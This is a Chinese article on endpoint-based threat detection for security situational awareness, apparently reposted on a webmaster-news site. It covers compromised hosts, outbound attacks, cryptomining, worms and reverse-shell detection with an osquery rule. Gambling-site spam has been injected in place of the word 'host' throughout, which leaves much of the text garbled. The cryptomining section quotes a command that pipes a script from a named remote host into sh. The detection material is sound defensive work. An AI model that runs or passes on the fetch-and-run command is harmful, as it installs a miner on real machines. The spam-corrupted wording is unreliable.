设为首页 - 加入收藏 酒泉站长网 (http://www.0937zz.com)- 国内知名站长资讯网站,提供最新最全的站长资讯,创业经验,网站建设等!
热搜: 平台 图片 之路
当前位置: 首页 > 365体育投注官网是干嘛的 > 外闻 > 正文

态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

发布时间:2019-02-21 06:56 所属栏目:[外闻] 来源:4hou
导读:0x00、业务需求 企业IT架构数字化转型的大潮中,往往会面临各种各样的安全威胁,包括:系统和应用软件漏洞利用攻击,APT攻击,数据泄露,云bet356亚洲版_bet356备用网站_bet356体育在线投注滥用,DDoS攻击等。同时为了应对速度越来越快的网络犯罪攻击,以及针对性攻击的多态化。为我们安全人员提出

?0x00、业务需求

企业IT架构数字化转型的大潮中,往往会面临各种各样的安全威胁,包括:系统和应用软件漏洞利用攻击,APT攻击,数据泄露,云bet356亚洲版_bet356备用网站_bet356体育在线投注滥用,DDoS攻击等。同时为了应对速度越来越快的网络犯罪攻击,以及针对性攻击的多态化。为我们安全人员提出了更高的要求。

在做应急响应安全事件过程的过程中,确认攻击痕迹一般从以下几个方面:

态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

0x01、bet356亚洲版_bet356备用网站_bet356体育在线投注安全告警

在态势感知产品中,,在bet356亚洲版_bet356备用网站_bet356体育在线投注上部署EDR终端是一个很好的bet356亚洲版_bet356备用网站_bet356体育在线投注安全量化的一个过程。因为我们在bet356亚洲版_bet356备用网站_bet356体育在线投注上可以收集进程、端口、账号、软件以及文件目录基础的安全数据。通过这些基础数据通过后台大数据分析加工形成我们感知到威胁。

本篇主要从bet356亚洲版_bet356备用网站_bet356体育在线投注端做检测,bet356亚洲版_bet356备用网站_bet356体育在线投注端检测有以下优势:

  • 单纯的网络层威胁检测无法和终端数据联动,形成的证据链可信度低。
  • 加密连接,通过SSL的bash反连等,无法通过网络检测,需要深度学习检测,检测成本过高。
  • threat hunting需求,可以更深入调查,包括获取恶意程序。

那么我们先从入侵行为分析开始:

  • 失陷主机

检测思路:需要收集bet356亚洲版_bet356备用网站_bet356体育在线投注端基础数据: 实时网络连接数据,同时需要商业威胁情报数据源。

实时网络连接数据,实验环境搭建:通过kolide+osquery+ElasticSearch+kibana。

实现步骤:

1、从bet356亚洲版_bet356备用网站_bet356体育在线投注端获取基础外联网络数据。

2、通过flink或者spark streaming做实时Top进程、Top外联IP统计,分析所有bet356亚洲版_bet356备用网站_bet356体育在线投注上传的外联孤岛数据,也可以编辑规则重点监控下载应用程序,或者下载对端的应用如果是HFS服务。需要重点关注。当然这里可以玩的playbook很多,需要用户自己挖掘。

3、从中获取到应有程序路径、对外连接IP信息,以及端口。通过IP地址查询威胁情报,如果对端IP地址使用的C2、Tor、VPN、SS等地址视为失陷主机。态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

  • 对外可疑连接

检测思路:这里主要是增加内容特征,比如说:上传设备基本信息、发送攻击指令、获取公网IP地址、黑客攻击连接等。bet356亚洲版_bet356备用网站_bet356体育在线投注端需要把恶意程序上传云查杀或者云沙箱做深入检测。

实验环境:Malice(支持Yara+多杀毒引擎集成+virustotal)+ClamAV +ElasticSearch+kibana。

IDS检测规则完善:

态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

当然需要一个安全Team维护这个规则。

检测流程:

1、通过IDS检测到对外连接。

2、通过网络通讯进程关联到文件。

3、上传文件到云查杀系统中检测。如果发现病毒告警。

  • 对外DDoS

检测思路:通过获取实时进程快照,网络对外连接快照,网络层获取其流量信息,同时也上传对应的进程文件到云查杀和云沙箱检测。在网络层检测通过IDS规则检测到对外DDoS攻击最多为:NTP反射攻击、memcache反射攻击。但是在bet356亚洲版_bet356备用网站_bet356体育在线投注端检测会发现更多攻击方式,例如:CC攻击、SIP协议攻击、视频协议攻击、SYN Flood、ACK Flood等。当然需要客户端抓包进一步确认。

检测流程:

1、获取进程快照,网络对外连接快照,对外连接网络流量(需要驱动支持)或者获取总流量。

2、执行抓包程序,采集bet356亚洲版_bet356备用网站_bet356体育在线投注端Pcap包,上传Pcap包样本到bet356亚洲版_bet356备用网站_bet356体育在线投注端。

3、通过各种DDoS攻击规则过滤,如果发现预定的攻击类型。

  • 挖矿检测

检测思路:特征是CPU占用率过高。通过上传进程快照,同时获取类似top命令CPU占用率信息。可以确定挖矿进程。当然还有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖矿。

检测流程:

1、获取进程快照,CPU占用率信息。

2、多次CPU占率过高的进程聚合。

3、上传文件到云查杀系统中检测。如果发现病毒告警。

4、复查各个端口被入侵的痕迹,如果产生以下攻击告警,需要大数据关联分析(flink or spark streaming)。

态势感知——bet356亚洲版_bet356备用网站_bet356体育在线投注安全策略探索

  • 对外爆破

检测思路:关联网络层检测和bet356亚洲版_bet356备用网站_bet356体育在线投注端检测相关进程。

检测流程:

1、获取进程快照,对外网络连接快照。

2、获取网络层面各种协议的暴力破解告警。

3、使用flink or spark streaming 做大数据关联分析。

  • 蠕虫病毒

检测思路:如果存在对外扫描功能,通过大数据分析网络连接,短时间内过多连接视为可疑。

检测流程:

1、获取进程快照,对外网络连接快照。

2、获取网络层面对外可疑连接告警。

3、上传文件到云查杀系统中检测。进一步分析,发现病毒标记为蠕虫病毒告警。

  • 反弹shell

检测思路:sh或者bash运行打开远程连接,视为反弹shell。

检测流程:

1、获取进程快照,对外网络连接快照。

2、查询语句。

  1. "behavioral_reverse_shell":?{?
  2. ??????"query"?:?"SELECT?DISTINCT(processes.pid),?processes.parent,?processes.name,?processes.path,?processes.cmdline,?processes.cwd,?processes.root,?processes.uid,?processes.gid,?processes.start_time,?process_open_sockets.remote_address,?process_open_sockets.remote_port,?(SELECT?cmdline?FROM?processes?AS?parent_cmdline?WHERE?pid=processes.parent)?AS?parent_cmdline?FROM?processes?JOIN?process_open_sockets?USING?(pid)?LEFT?OUTER?JOIN?process_open_files?ON?processes.pid?=?process_open_files.pid?WHERE?(name='sh'?OR?name='bash')?AND?remote_address?NOT?IN?('0.0.0.0',?'::',?'')?AND?remote_address?NOT?LIKE?'10.%'?AND?remote_address?NOT?LIKE?'192.168.%';",?
  3. ??????"interval"?:?600,?
  4. ??????"description"?:?"Find?shell?processes?that?have?open?sockets"?
  5. ????},?
  • rootkit检测

【免责声明】本站内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

网友评论
推荐文章